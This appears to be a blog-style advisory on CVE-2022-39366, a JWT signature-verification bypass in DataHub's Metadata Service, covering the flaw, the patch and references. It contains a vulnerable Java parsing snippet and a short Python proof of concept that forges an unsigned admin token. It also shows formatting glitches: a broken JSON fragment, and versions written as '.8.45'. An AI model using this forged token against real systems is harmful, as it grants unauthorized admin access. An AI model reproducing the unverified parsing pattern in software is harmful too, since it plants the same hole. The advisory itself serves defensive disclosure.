CVE-2022-39366 - Critical Auth Bypass in DataHub—How Unverified JWTs Threaten Your Metadata

Summary:  
A critical security flaw—CVE-2022-39366—was discovered in DataHub, an open-source metadata platform, in its Metadata Service (GMS). The flaw allowed anyone to bypass authentication by sending unsigned or self-forged JWT tokens. If you’re running DataHub before version .8.45 and have authentication enabled, your system could be compromised.

What is DataHub?

DataHub is LinkedIn’s open-source metadata platform, widely used for data discovery, governance, and lineage. It helps organizations better manage and understand their data assets across cloud and on-premises systems.

The Vulnerability: Unverified JWTs

The vulnerability lived in the StatelessTokenService. This service was expected to validate JWT (JSON Web Token) signatures before letting users in. However, due to improper use of the io.jsonwebtoken.JwtParser, no signature verification was performed.

How It Slips

The root cause is that the service called the parser’s parse method, not parseClaimsJws, allowing tokens to be accepted regardless of legitimacy—even if not cryptographically signed.

Example vulnerable code (simplified)

// Vulnerable: no signature check!
Claims claims = Jwts.parser()
    .parse(token)
    .getBody();
// Assumes valid without checking!

For context, the correct way would be

// Secure: validates signature
Claims claims = Jwts.parser()
    .setSigningKey(secretKey)
    .parseClaimsJws(token)
    .getBody();

In the vulnerable version, attackers could submit any JWT with arbitrary claims, posing as any DataHub user.

Real-World Exploitation

Who’s at risk?  
Any DataHub instance with authentication enabled, running before .8.45.

`json

{

"roles": ["ADMIN"]

}

Proof-of-Concept (PoC) in Python

import jwt  # pip install PyJWT

token = jwt.encode(
    {"sub": "admin", "roles": ["ADMIN"]},
    key='', # No secret needed!
    algorithm='none'
)
print(token)
# Now use this token to authenticate to DataHub.

The Patch

In version .8.45, the developers fixed this issue by correctly verifying the JWT signature using the appropriate method.

Corrected Java snippet

Claims claims = Jwts.parser()
    .setSigningKey(secretKey) // now must know the secret key
    .parseClaimsJws(token)
    .getBody();

Full patch details:
- PR: datahub PR #6783
- Change log: Release notes

There are no known workarounds—you must upgrade.

References

- NVD entry for CVE-2022-39366
- GitHub advisory GHSA-r5mh-2h6w-8g4v
- DataHub .8.45 Release
- JWT debugger - jwt.io

Takeaway

If you’re running DataHub behind authentication, you’re only as safe as your JWT validation. CVE-2022-39366 shows even trusted frameworks can be misused. Always keep your software up to date, follow coding best practices, and regularly review authentication logic.

Patch now—don’t leave your metadata exposed!

*Questions or feedback? Connect with the DataHub community at DataHub Slack*


*This post is for educational awareness. Use responsibly.*

Timeline

Published on: 10/28/2022 17:15:00 UTC
Last modified on: 10/31/2022 17:48:00 UTC